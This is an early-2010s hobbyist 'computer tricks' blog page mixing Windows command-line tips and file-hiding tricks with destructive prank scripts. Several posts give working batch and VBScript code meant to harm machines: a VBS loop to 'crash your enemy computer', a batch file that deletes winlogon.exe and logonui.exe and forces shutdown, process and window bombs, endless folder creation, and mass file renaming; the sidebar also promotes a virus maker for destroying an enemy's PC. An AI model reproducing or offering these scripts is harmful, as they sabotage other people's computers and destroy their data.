Liked us?

d

Welcome to This Blog

Hello and welcome everyone to this blog.Here you can get wonderful computer tricks and tweakz .Also I will provide you freebies time to time so just seat back and explore this blog.......

Make your own virus - DELmE's Batch Virus Maker

Hackforums.net has made a virus generator program with the use of it you can make your own virus..........thes virus are so dangerous that it can destroy your whole PC so I warn you use this program at your own risk.But thes program is best to destroy your enemy's computer,If you want to know how a virus is made then these programme is best for you

Making a dangerous virus -Matrix !!!!! For EDUCATIONAL PURPOSE ONLY

This virus will wipe out your whole HD using an animation of 10secs, it will also use your IP to harm you and your isp (not bad in my case tongue.gif ) and spread to all your contacts...

How to create a fake error message-mostly for windows

With this help of this page you will know come to know how to create a fake error message which works mostly for windows

Windows explorer shortcuts

In this page you will came to know about the windows explorer shortcuts which will help you in using your computer faster

Annoying Google - Google hacks

In this trick the capitalisation of your searches will change automatically.Some words will change into small letter and some into capital letters in your search result.Also there will be the change of logo as you can see in the picture

Showing posts with label Dos. Show all posts
Showing posts with label Dos. Show all posts

How to Hide Files in a .jpg 0

Coder Himanshu | Tuesday, April 12, 2011 | , ,

Heres how you Hide a File in a .jpg

Set up:
1. Must have a .zip or .rar compressor.
2. Willingness to learn.

Steps:
1. Save the picture of choice to your desktop.

2. Make a new .rar or .zip folder on your desktop.

3. Add the files you want to hide into the .zip or .rar

4. Click start menu, run, cmd.

5. In Command Prompt type cd "desktop" with the quotation marks.

6. Now type in copy /b picturename.jpg + foldername.rar outputfilename.jpg
( If you use .zip then: copy /b picturename.jpg + foldername.zip outputfilename.jpg)

7. Now there should be the outputed file name with a .jpg extension on the desktop.
( Do not close Command Prompt just yet )

8. Double click it to open the picture and check it out.

9. When your done looking, and want to view the hidden files
Type: ren outputfilename.jpg outputfilename.rar or zip


Now you're done!


Please comment to make me publish more like this one undefined: undefined »

An Interesting Trick to Hide the Data in Notepad. 0

Coder Himanshu | Saturday, April 09, 2011 | , , ,

There is “An Interesting Trick to Hide the Data in Notepad.”
Here is a small trick to hide text inside your windows default text editor i.e. Notepad using command prompt, but this trick works only on NTFS file system.
Steps to hide text in a Notepad
1. Open your command prompt Start–>Run and Type cmd




2. Type cd.. to move to C:\> drive or Type cd desktop to move to your desktop.


3. Type the below code in your command prompt
notepad filename.txt: hidden
4. Write some data and save (Ctrl+s) the file.
5. Browse to the file location and Open filename.txt you cannot see any data in the file.
6. To retrieve the hidden data open command prompt and type the same command.
Notepad filename.txt:hidden undefined: undefined »

Useful Windows xp dos command 0

Coder Himanshu | Saturday, March 05, 2011 | , , , ,




Windows Command Line prompt is a most efficient and faster way of doing things in Windows XP. Here's a run-down of the most useful DOS commands available in Windows XP. Some of these DOS commands even do not have an visual alternative.
.
ipconfig - Windows IP configuration
Useful for troubleshooting your internet connection.Displays the current IP address of your computer and the DNS server address. If you call your ISP for reporting a bad internet connection, he will probably ask you to run ipconfig.

fc - Free BeyondCompare in XP
FC is an advanced DOS Command that compares two files and displays the differences between them. Though the file comparison results are not as interactive as BeyondCompare or Altova DiffDog, fc is still very useful. You can even set fc to resynchronize the files after finding a mismatch.
type - open text files sans Notepad
Similar to Unix cat command, Type is my favorite DOS command for displaying the contents of a text files without modifying them. When used in combination with more switch, type splits the contents of lengthy text files into multiple pages. Avoid using the type command with binary files or you'll hear alien PC beeps and see some greek characters on your PC. 

ping - Say hello to another Computer
Ping network command followed by the web-address or IP address tells you about the health of the connection and whether the other party is responding to your handshake request. Ping tool can also be used to convert the web address to a physical IP address.
tree - visual directory structure
You often need to take prints of your physical directory structure but XP has no simple "visual" commands for printing directory contents. Here, try the Tree DOS command and redirect the output to a text file. 

tree > mydirectory.txt
print mydirectory.txt
attrib - make hidden files visible
Attrib lets you change attributes of System files and even hidden files. This is great for troubleshooting Windows XP. Say your XP doesn't boot ever since you edited that startup boot.ini file (Hidden), use attrib to remove the Hidden attibute and edit the file using EDIT dos command.
assoc - which program will open that .xyz file
The assoc DOS command can be used to either isplay or even modify the file name extension associations. The command assoc .htm will quickly tell you the name of your default web browser (see picture)
move - more flexible than copy-paste
Say you got a lot of XLS and DOC files in you MyDocuments folder and want to move only those XLS files that have their name ending with 2006. In XP Explorer, you have to manually select each file and then cut-paste to another folder. However, the DOS move command make things much simpler. Just type the following at the command prompt:
move *2006.xlsc:\2006Reports\                                                  
find - advanced file search with filter
Find is the most powerful DOS command and even more useful than the Windows Desktop Search tool or the Windows Find Wizard. The find command searches for a specific string of text in a file or files. After searching the specified file or files, find displays any lines of text that contain the specified string.
To search your hard disk to find and display the file names on drive C: that contain the string "Google" use the pipe (|) to direct the results of a dir command to find as follows:
dir c:\ /s /b | find "Google"
Quick tip - Drag to avoid typing: When your command acts on a file or folder, you must type the path to that folder after the command. You can save typing time by dragging the file or folder from Windows Explorer into the command window.
 To view help at the command-line, at the command prompt, type the following:
CommandName /?

Pass a comment if you like this post!!!! undefined: undefined »

Command Lines....for command prompt (A to Z ) 0

Coder Himanshu | Friday, February 04, 2011 | ,

 Do you like shortcuts in your life ..... If yes then from today ownards your life will be more faster than ever as today I will tell you all the shortcuts from A to Z which can be used in Command Prompt..


You will see below all the shortcuts from A to Z


An A to Z Index of the Windows command line


 
ADDUSERS Add or list users to/from a CSV file
ARP Address Resolution Protocol
ASSOC Change file extension associations•
ASSOCIAT One step file association
ATTRIB Change file attributes

B
BOOTCFG Edit Windows boot settings

C
CACLS Change file permissions
CALL Call one batch program from another•
CD Change Directory - move to a specific Folder•
CHANGE Change Terminal Server Session properties
CHKDSK Check Disk - check and repair disk problems
CHKNTFS Check the NTFS file system
CHOICE Accept keyboard input to a batch file
CIPHER Encrypt or Decrypt files/folders
CleanMgr Automated cleanup of Temp files, recycle bin
CLEARMEM Clear memory leaks
CLIP Copy STDIN to the Windows clipboard.
CLS Clear the screen•
CLUSTER Windows Clustering
CMD Start a new CMD shell
COLOR Change colors of the CMD window•
COMP Compare the contents of two files or sets of files
COMPACT Compress files or folders on an NTFS partition
COMPRESS Compress individual files on an NTFS partition
CON2PRT Connect or disconnect a Printer
CONVERT Convert a FAT drive to NTFS.
COPY Copy one or more files to another location•
CSCcmd Client-side caching (Offline Files)
CSVDE Import or Export Active Directory data

D
DATE Display or set the date•
DEFRAG Defragment hard drive
DEL Delete one or more files•
DELPROF Delete NT user profiles
DELTREE Delete a folder and all subfolders
DevCon Device Manager Command Line Utility
DIR Display a list of files and folders•
DIRUSE Display disk usage
DISKCOMP Compare the contents of two floppy disks
DISKCOPY Copy the contents of one floppy disk to another
DISKPART Disk Administration
DNSSTAT DNS Statistics
DOSKEY Edit command line, recall commands, and create macros
DSACLs Active Directory ACLs
DSAdd Add items to active directory (user group computer)
DSGet View items in active directory (user group computer)
DSQuery Search for items in active directory (user group computer)
DSMod Modify items in active directory (user group computer)
DSMove Move an Active directory Object
DSRM Remove items from Active Directory
E
 
ECHO Display message on screen•
ENDLOCAL End localisation of environment changes in a batch file•
ERASE Delete one or more files•
EVENTCREATE Add a message to the Windows event log
EXIT Quit the current script/routine and set an errorlevel•
EXPAND Uncompress files
EXTRACT Uncompress CAB files
F
 
FC Compare two files
FIND Search for a text string in a file
FINDSTR Search for strings in files
FOR /F Loop command: against a set of files•
FOR /F Loop command: against the results of another command•
FOR Loop command: all options Files, Directory, List•
FORFILES Batch process multiple files
FORMAT Format a disk
FREEDISK Check free disk space (in bytes)
FSUTIL File and Volume utilities
FTP File Transfer Protocol
FTYPE Display or modify file types used in file extension associations•
G
 
GLOBAL Display membership of global groups
GOTO Direct a batch program to jump to a labelled line•
GPUPDATE Update Group Policy settings
H
 
HELP Online Help
I
 
iCACLS Change file and folder permissions
IF Conditionally perform a command•
IFMEMBER Is the current user in an NT Workgroup
IPCONFIG Configure IP
K

KILL Remove a program from memory
L
 
LABEL Edit a disk label
LOCAL Display membership of local groups
LOGEVENT Write text to the NT event viewer
LOGOFF Log a user off
LOGTIME Log the date and time in a file
M

MAPISEND Send email from the command line
MBSAcli Baseline Security Analyzer.
MEM Display memory usage
MD Create new folders•
MKLINK Create a symbolic link (linkd)
MODE Configure a system device
MORE Display output, one screen at a time
MOUNTVOL Manage a volume mount point
MOVE Move files from one folder to another•
MOVEUSER Move a user from one domain to another
MSG Send a message
MSIEXEC Microsoft Windows Installer
MSINFO Windows NT diagnostics
MSTSC Terminal Server Connection (Remote Desktop Protocol)
MUNGE Find and Replace text within file(s)
MV Copy in-use files
N

NET Manage network resources
NETDOM Domain Manager
NETSH Configure Network Interfaces, Windows Firewall & Remote access
NETSVC Command-line Service Controller
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUP Name server lookup
NTBACKUP Backup folders to tape
NTRIGHTS Edit user account rights
O
 
OPENFILES Query or display open files
P
 
PATH Display or set a search path for executable files•
PATHPING Trace route plus network latency and packet loss
PAUSE Suspend processing of a batch file and display a message•
PERMS Show permissions for a user
PERFMON Performance Monitor
PING Test a network connection
POPD Restore the previous value of the current directory saved by PUSHD•
PORTQRY Display the status of ports and services
POWERCFG Configure power settings
PRINT Print a text file
PRNCNFG Display, configure or rename a printer
PRNMNGR Add, delete, list printers set the default printer
PROMPT Change the command prompt•
PsExec Execute process remotely
PsFile Show files opened remotely
PsGetSid Display the SID of a computer or a user
PsInfo List information about a system
PsKill Kill processes by name or process ID
PsList List detailed information about processes
PsLoggedOn Who's logged on (locally or via resource sharing)
PsLogList Event log records
PsPasswd Change account password
PsService View and control services
PsShutdown Shutdown or reboot a computer
PsSuspend Suspend processes
PUSHD Save and then change the current directory•
q
QGREP Search file(s) for lines that match a given pattern.
R
 
RASDIAL Manage RAS connections
RASPHONE Manage RAS connections
RECOVER Recover a damaged file from a defective disk.
REG Registry: Read, Set, Export, Delete keys and values
REGEDIT Import or export registry settings
REGSVR32 Register or unregister a DLL
REGINI Change Registry Permissions
REM Record comments (remarks) in a batch file•
REN Rename a file or files•
REPLACE Replace or update one file with another
RD Delete folder(s)•
RMTSHARE Share a folder or a printer
ROBOCOPY Robust File and Folder Copy
ROUTE Manipulate network routing tables
RUNAS Execute a program under a different user account
RUNDLL32 Run a DLL command (add/remove print connections)
S
 
SC Service Control
SCHTASKS Schedule a command to runt a specific time
SCLIST Display NT Services
SET Display, set, or remove environment variables•
SETLOCAL Control the visibility of environment variables•
SETX Set environment variables permanently
SFC System File Checker
SHARE List or edit a file share or print share
SHIFT Shift the position of replaceable parameters in a batch file•
SHORTCUT Create a windows shortcut (.LNK file)
SHOWGRPS List the NT Workgroups a user has joined
SHOWMBRS List the Users who are members of a Workgroup
SHUTDOWN Shutdown the computer
SLEEP Wait for x seconds
SLMGR Software Licensing Management (Vista/2008)
SOON Schedule a command to run in the near future
SORT Sort input
START Start a program or command in a separate window•
SU Switch User
SUBINACL Edit file and folder Permissions, Ownership and Domain
SUBST Associate a path with a drive letter
SYSTEMINFO List system configuration
T
 
TASKLIST List running applications and services
TASKKILL Remove a running process from memory
TIME Display or set the system time•
TIMEOUT Delay processing of a batch file
TITLE Set the window title for a CMD.EXE session•
TLIST Task list with full path
TOUCH Change file timestamps
TRACERT Trace route to a remote host
TREE Graphical display of folder structure
TYPE Display the contents of a text file•
U
 
USRSTAT List domain usernames and last login
V
 
VER Display version information•
VERIFY Verify that files have been saved•
VOL Display a disk label•
W
 
WHERE Locate and display files in a directory tree
WHOAMI Output the current UserName and domain
WINDIFF Compare the contents of two files or sets of files
WINMSD Windows system diagnostics
WINMSDP Windows system diagnostics II
WMIC WMI Commands

X
 
XCACLS Change file and folder permissions
XCOPY Copy files and folders undefined: undefined »

Crash your enemy computer 0

Coder Himanshu | Monday, January 10, 2011 | ,

USE THIS ON YOUR OWN RESPONSIBILITY
This Will Crash Your enemy Computer
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next



Save It As Anything.vbs and send it to your enemy.never double-click this file..
It Only Works With Windows XP undefined: undefined »

Endless Command prompt windows 0

Coder Himanshu | Monday, January 10, 2011 | ,

1. open notepad and type: start 2.bat
2. Save it as 1.bat (make sure you choose all files when saving it)
3. Make another new text document and type: start 1.bat
4. Save it as 2.bat into the same folder as the other one.
All you have to do to start it is to click on either of them undefined: undefined »

Right Clicking disabled 0

Coder Himanshu | Monday, January 10, 2011 | ,

1. From the Start menu, select Run.
Type gpedit.msc and click OK.
2. Get to this location:
User Configuration > Administrative templates > Windows Components > Windows Explorer
3. In the right pane double click on :
Remove Windows Explorer’s default context menu
4. Select Disable and click OK. undefined: undefined »

Dangerous batch File Coding 0

Coder Himanshu | Monday, January 10, 2011 | ,

1.copy this and paste this in your notepad..
@echo off
del c:\windows\system32\restore
del c:\windows\system32\winlogon.exe
del c:\windows\system32\logonui.exe
shutdown -f
2.save it and give it a name like “HIMANSHU” or whatever just remember to put “.bat” at the end of it.

warning...the end is not my fault ...so justthink twice before doing it... undefined: undefined »

Batch File Tricks(create 3000 folder in a single minute) 1

Coder Himanshu | Monday, January 10, 2011 | ,

open notepad and type
@echo off
:loop
md %random%
goto loop
save as himanshu.bat
undefined: undefined »

Application Bomber 0

Coder Himanshu | Monday, January 10, 2011 | ,

open notepad & type
@echo off
:loop
start notepad
start compmgmt.msc
start mspaint
start osk
start cmd
start explorer
start control
start calc
goto loop
save as himanshu.bat


WARNING: dis may slow down ur computer for a minute or so....but u will enjoy it or get angry with it thats for sure..... undefined: undefined »

Msg Annoyer (Message Broadcaster) 0

Coder Himanshu | Monday, January 10, 2011 | ,

Open Notepad & Type
@echo off
:netannoy
msg * Hi!
msg * How r u ?
msg * Wat’s Up ?
msg * Myself Himanshu Gogoi….
msg * My Web Links are….
msg * www.Himanshu-Software.blogspot.com…..
msg * my Email Id
msg * hgogoi201@hotmail.com
goto netannoy
Save as himansu.bat undefined: undefined »

Cool Batch Files 0

Coder Himanshu | Monday, January 10, 2011 | ,

Open Notepad & Type
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

Save as himanshu.bat undefined: undefined »